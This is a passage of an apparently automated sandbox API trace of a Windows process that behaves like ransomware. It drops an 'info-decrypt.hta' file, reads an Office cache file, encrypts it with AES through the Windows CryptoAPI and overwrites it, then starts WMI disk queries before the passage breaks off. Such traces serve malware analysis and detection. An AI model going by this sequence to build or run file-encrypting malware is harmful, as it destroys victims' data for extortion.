(normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x538 [0131.371] GetFileType (hFile=0x538) returned 0x1 [0131.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f3e8) returned 1 [0131.372] GetFileType (hFile=0x538) returned 0x1 [0131.372] WriteFile (in: hFile=0x538, lpBuffer=0x38c3294*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6c0f4b0, lpOverlapped=0x0 | out: lpBuffer=0x38c3294*, lpNumberOfBytesWritten=0x6c0f4b0*=0x1000, lpOverlapped=0x0) returned 1 [0131.373] WriteFile (in: hFile=0x538, lpBuffer=0x38c3294*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6c0f484, lpOverlapped=0x0 | out: lpBuffer=0x38c3294*, lpNumberOfBytesWritten=0x6c0f484*=0x55e, lpOverlapped=0x0) returned 1 [0131.373] CloseHandle (hObject=0x538) returned 1 [0131.373] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0131.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0131.373] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x38c42b0 | out: lpFileInformation=0x38c42b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb)) returned 1 [0131.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0131.374] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0131.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0131.374] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0131.374] GetFileType (hFile=0x538) returned 0x1 [0131.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0131.374] GetFileType (hFile=0x538) returned 0x1 [0131.374] GetFileSize (in: hFile=0x538, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x102fcbb [0132.058] ReadFile (in: hFile=0x538, lpBuffer=0x6d91018, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x6d91018*, lpNumberOfBytesRead=0x6c0f4ec*=0x102fcbb, lpOverlapped=0x0) returned 1 [0135.498] CloseHandle (hObject=0x538) returned 1 [0135.713] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbe07a0) returned 1 [0137.507] CryptGenRandom (in: hProv=0xbe07a0, dwLen=0x10, pbBuffer=0x3782668 | out: pbBuffer=0x3782668) returned 1 [0141.678] CryptImportKey (in: hProv=0xbe07a0, pbData=0x3587364, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7ef90) returned 1 [0141.678] CryptContextAddRef (hProv=0xbe07a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.678] CryptContextAddRef (hProv=0xbe07a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.678] CryptDuplicateKey (in: hKey=0xb7ef90, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7efd0) returned 1 [0141.678] CryptContextAddRef (hProv=0xbe07a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.678] CryptSetKeyParam (hKey=0xb7efd0, dwParam=0x4, pbData=0x3587444*=0x1, dwFlags=0x0) returned 1 [0141.678] CryptSetKeyParam (hKey=0xb7efd0, dwParam=0x1, pbData=0x3587410, dwFlags=0x0) returned 1 [0142.524] CryptEncrypt (in: hKey=0xb7efd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x94a1018*, pdwDataLen=0x6c0f4b8*=0x102fcc0, dwBufLen=0x102fcc0 | out: pbData=0x94a1018*, pdwDataLen=0x6c0f4b8*=0x102fcc0) returned 1 [0144.534] CryptEncrypt (in: hKey=0xb7efd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36796ec*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x36796ec*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0144.536] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0144.536] CryptReleaseContext (hProv=0xbe07a0, dwFlags=0x0) returned 1 [0144.536] CryptReleaseContext (hProv=0xbe07a0, dwFlags=0x0) returned 1 [0144.536] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0144.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0144.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0144.538] GetFileType (hFile=0x4dc) returned 0x1 [0144.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0144.538] GetFileType (hFile=0x4dc) returned 0x1 [0144.538] WriteFile (in: hFile=0x4dc, lpBuffer=0x3679db8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3679db8*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0144.539] CloseHandle (hObject=0x4dc) returned 1 [0145.176] CoTaskMemAlloc (cb=0x20c) returned 0xbc96b0 [0145.176] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbc96b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0145.176] CoTaskMemFree (pv=0xbc96b0) [0145.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0145.176] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0145.176] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0145.176] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0145.176] IUnknown:Release (This=0xb51e34) returned 0x1 [0145.177] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x60248c0) returned 0x0 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0145.178] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x60257d0) returned 0x0 [0145.178] WbemDefPath:IUnknown:Release (This=0x60248c0) returned 0x0 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x60257d0) returned 0x0 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0145.178] WbemDefPath:IUnknown:AddRef (This=0x60257d0) returned 0x3 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0145.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbe2640) returned 0x0 [0145.178] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2640, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0145.178] WbemDefPath:IUnknown:Release (This=0xbe2640) returned 0x3 [0145.178] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0145.178] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0145.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0145.179] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x2 [0145.179] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x1 [0145.179] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0145.179] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0145.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x60257d0, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x60257d0) returned 0x0 [0145.179] WbemDefPath:IUnknown:AddRef (This=0x60257d0) returned 0x3 [0145.179] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x2 [0145.179] WbemDefPath:IWbemPath:SetText (This=0x60257d0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60257d0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetInfo (in: This=0x60257d0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60257d0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetInfo (in: This=0x60257d0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetInfo (in: This=0x60257d0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60257d0, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0145.179] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0145.179] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0145.179] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0145.179] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0145.179] IUnknown:Release (This=0xb51e34) returned 0x1 [0145.180] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60248a0) returned 0x0 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0145.180] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6025760) returned 0x0 [0145.180] WbemDefPath:IUnknown:Release (This=0x60248a0) returned 0x0 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6025760) returned 0x0 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0145.180] WbemDefPath:IUnknown:AddRef (This=0x6025760) returned 0x3 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0145.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbb58f8) returned 0x0 [0145.181] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb58f8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0145.181] WbemDefPath:IUnknown:Release (This=0xbb58f8) returned 0x3 [0145.181] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0145.181] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0145.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0145.181] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x2 [0145.181] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x1 [0145.181] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0145.181] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0145.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6025760) returned 0x0 [0145.181] WbemDefPath:IUnknown:AddRef (This=0x6025760) returned 0x3 [0145.181] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x2 [0145.181] WbemDefPath:IWbemPath:SetText (This=0x6025760, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0145.181] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025760, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0145.181] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0145.181] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0145.181] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0145.181] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0145.181] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0145.181] IUnknown:Release (This=0xb51e34) returned 0x1 [0145.182] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x602b450) returned 0x0 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x602b450, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0145.182] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b450, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6024890) returned 0x0 [0145.182] WbemLocator:IUnknown:Release (This=0x602b450) returned 0x0 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6024890) returned 0x0 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0145.182] WbemLocator:IUnknown:AddRef (This=0x6024890) returned 0x3 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0145.182] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0145.182] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0145.182] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 